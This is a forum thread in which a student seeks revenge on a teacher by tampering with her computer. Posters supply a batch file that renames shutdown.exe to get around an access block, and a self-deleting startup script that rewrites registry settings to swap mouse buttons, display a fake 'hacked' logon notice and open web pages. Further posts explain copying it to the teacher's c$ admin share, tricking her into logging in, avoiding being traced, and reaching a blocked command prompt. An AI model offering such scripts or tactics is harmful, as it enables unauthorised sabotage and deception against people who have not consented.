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Thread: Shutdown Using MS-DOS

  1. #1
    Unregistered Guest

    Shutdown Using MS-DOS

    My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?


  2. #2
    ABHIS Guest

    Re: Shutdown Using MS-DOS

    Originally posted by Unregistered
    My -------- teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
    *.I need to know if the Operating System is WinXP or W2K
    2.Is the computer part of a LAN, is the open session belongs to the admin group?
    *.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

    Off hand I would do the following that might evntually work:
    *. open with notepad or edit an empty file (on your computer)
    2. copy then paste these lines in this file

    copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
    call abcd*2*4 -s

    *. save the file and name it abcd.bat
    4. copy this abcd.bat file to the target computer and run the abcd.bat

    ABHIS (a guest)

  3. #3
    ABHIS Guest

    Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    4. copy this abcd.bat file to the target computer and run the abcd.bat
    By the way, if all PCs are connected on LAN (network), simply copy abcd.bat to a shared commun folder accessible all over the network.
    Go to the target PC, locate abcd.bat where you put it, hit it (AND RUN)

  4. #4
    Unregistered Guest

    Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    *.I need to know if the Operating System is WinXP or W2K
    2.Is the computer part of a LAN, is the open session belongs to the admin group?
    *.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

    Off hand I would do the following that might evntually work:
    *. open with notepad or edit an empty file (on your computer)
    2. copy then paste these lines in this file

    copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
    call abcd*2*4 -s

    *. save the file and name it abcd.bat
    4. copy this abcd.bat file to the target computer and run the abcd.bat

    ABHIS (a guest)
    The operating system is XP and is connected by LAN.
    I attempted to shut it down by shutdown -i and searching for it. I found it, but "Access is Denied" came up. I'm not in there right now, but I'll try it tomorrow and let you know how it worked.


  5. #5
    Unregistered Guest

    Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    *.I need to know if the Operating System is WinXP or W2K
    2.Is the computer part of a LAN, is the open session belongs to the admin group?
    *.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message

    Off hand I would do the following that might evntually work:
    *. open with notepad or edit an empty file (on your computer)
    2. copy then paste these lines in this file

    copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
    call abcd*2*4 -s

    *. save the file and name it abcd.bat
    4. copy this abcd.bat file to the target computer and run the abcd.bat

    ABHIS (a guest)
    I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a).

  6. #6
    Join Date
    Jan 2005
    I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.

    Put This Under All Users and make her log onto your computer...

    SAVE AS WinHelp.BAT and place the file here
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup

    echo off
    echo REGEDIT4 >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
    echo "SwapMouseButtons"="*" >> c:\reg.reg
    echo "MouseSpeed"="*" >> c:\reg.reg
    echo "DoubleClickSpeed"="*00" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
    echo "Key***rdDelay"="5" >> c:\reg.reg
    echo "Key***rdSpeed"="*0" >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
    echo "Start Page"="" >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
    echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
    echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
    echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg

    REGEDIT /s c:\reg.reg
    start iexplore.exe [url][/url]
    start iexplore.exe [url][/url]
    start iexplore.exe [url][/url]
    del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
    Edited for links.
    Last edited by DATA; 02-13-2005 at 11:04 AM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
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    [URL=http://www.syntax******.info]Comming Soon[/URL]

  7. #7
    ABHIS Guest

    Re: Re: Re: Shutdown Using MS-DOS

    Originally posted by Unregistered
    I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a).
    Where you able to run the .bat file on the teacher's PC?
    I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
    It makes all the difference, see why:
    In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
    They are authenticated by their MD5 (using protection similar to SSM).
    When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
    If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.

    Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
    If however this protection exists, I am sure that you won't be even able to run regedit.exe

  8. #8
    Join Date
    Jan 2005


    Can you send me a link so i can read up on the MD5 authentication. I've never heard of it but is sounds like a good way to completely control what kids are doing on the computers. I think the access denied is just b.c of his "user" privledges trying to shutdown another persons computer on a lan... Ive seen the same error trying to shutdown a computer while logged on as a standard user.

    Since the TEACHER is logging on to his computer will the MD5 lockdowns still take place if she is an network admin? I'm guessing the MD5 authentication would tie into the Active Directory Server and grant her full permissions once she is logged onto his computer. Hopefully its not on a local base...

  9. #9
    Unregistered Guest

    Re: Re: Re: Re: Shutdown Using MS-DOS

    Originally posted by ABHIS
    Where you able to run the .bat file on the teacher's PC?
    I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
    It makes all the difference, see why:
    In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
    They are authenticated by their MD5 (using protection similar to SSM).
    When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
    If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.

    Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
    If however this protection exists, I am sure that you won't be even able to run regedit.exe
    I didn't open it from her computer. If i could do that, i would just go to Start, Shutdown.

    If I put the batch file ABHIS made in her startup, will it boot up, and shutdown as soon as abcd.bat is accessed?

    Same with SyntaX******'s file. Will it open all those websites and mess up her mouse, key***rd and display those lovely little messages as soon as it is started?

    If so, that would be fucking hilarious, lmao

    One more thing. If I do this and fuck up her computer, will they be able to trace it back to mine?

    Thanks, asdfghjkloo

  10. #10
    Join Date
    Jan 2005
    Bad News- You wont be able to put the file in her startup folder ~

    UNLESS she has her C:\ drive shared giveing all users permission to it. Test it out to see...

    Copy "PathOfFileOnYourComputer" "\\HERIPORCOMPUTERNAME\c$\"
    -If this works WOW, copy the file to her startup folder- Expect an Access Denied b.c i really doubt it is shared.

    About your conserns... She wont know what happened b.c the file deletes itself after it runs. It also does NO damage. It just tweaks the shit out of windows. I could add some other commands but this is just an old batch i wrote last year. I can make windows do whatever you would like it to do. Just let me know what you want and ill create it.

    *. You do NOT run the file
    2. You place the file here on your LOCAL COMPUTER
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
    *. You tell her you cant log onto the computer, ask her to help you... Get her to log onto the computer with her own username and password which will automatically start the program as soon as she logs into windows.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    [URL=******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  11. #11
    Unregistered Guest
    Originally posted by SyntaX******
    Bad News- You wont be able to put the file in her startup folder ~

    UNLESS she has her C:\ drive shared giveing all users permission to it. Test it out to see...

    Copy "PathOfFileOnYourComputer" "\\HERIPORCOMPUTERNAME\c$\"
    -If this works WOW, copy the file to her startup folder- Expect an Access Denied b.c i really doubt it is shared.

    About your conserns... She wont know what happened b.c the file deletes itself after it runs. It also does NO damage. It just tweaks the shit out of windows. I could add some other commands but this is just an old batch i wrote last year. I can make windows do whatever you would like it to do. Just let me know what you want and ill create it.

    *. You do NOT run the file
    2. You place the file here on your LOCAL COMPUTER
    C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
    *. You tell her you cant log onto the computer, ask her to help you... Get her to log onto the computer with her own username and password which will automatically start the program as soon as she logs into windows.
    I'm *5% sure her C drive is shared, dumbass, I guess she didn't expect for me to come along I've been experimenting with batch files, I think I can make a nice one. Thanks for the help though, I'll ask if I need your help.

    Also, in your batch file, what is c:\reg.reg and what does it do?\

    Thanks, asdfghjkloo

  12. #12
    ABHIS Guest
    Originally posted by Unregistered
    Also, in your batch file, what is c:\reg.reg and what does it do?\
    The " >> " is a stdin redirection, it means that you are redirecting whatever typed text into --> a file (in this particular case it is called reg.reg located on the root of disk C
    you may call it anything else, but in this expl you need to keep the .reg extension.
    By the way, DO NOT FORGET to add this line as well at the end of your batch file:
    del c:\reg.reg

  13. #13
    ABHIS Guest
    Add the line BEFORE del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
    Because whatever is AFTER this line is completely useless

  14. #14
    Join Date
    Jan 2005

    Shutdown someones comy

    At school i want to shutdown a friends computer but how do i go about it if i do not have access to command prompt. Is there any way?Or any other programs similar to command prompt that will be allowed?

    thanks a lot in advance for your help.

  15. #15
    Unregistered Guest

    Re: Shutdown someones comy

    Originally posted by *2*456
    At school i want to shutdown a friends computer but how do i go about it if i do not have access to command prompt. Is there any way?Or any other programs similar to command prompt that will be allowed?

    thanks a lot in advance for your help.
    You can access the command prompt by:
    *. Start, Programs, Accessories, Command Prompt.
    2. Click Start and Run. Then type "cmd" (no quotation marks) and hit enter.
    *. Open notepad and type start in the document. Save the document as cmd.bat on the desktop (so you can easily delete it after you're through with it) and then run the file.


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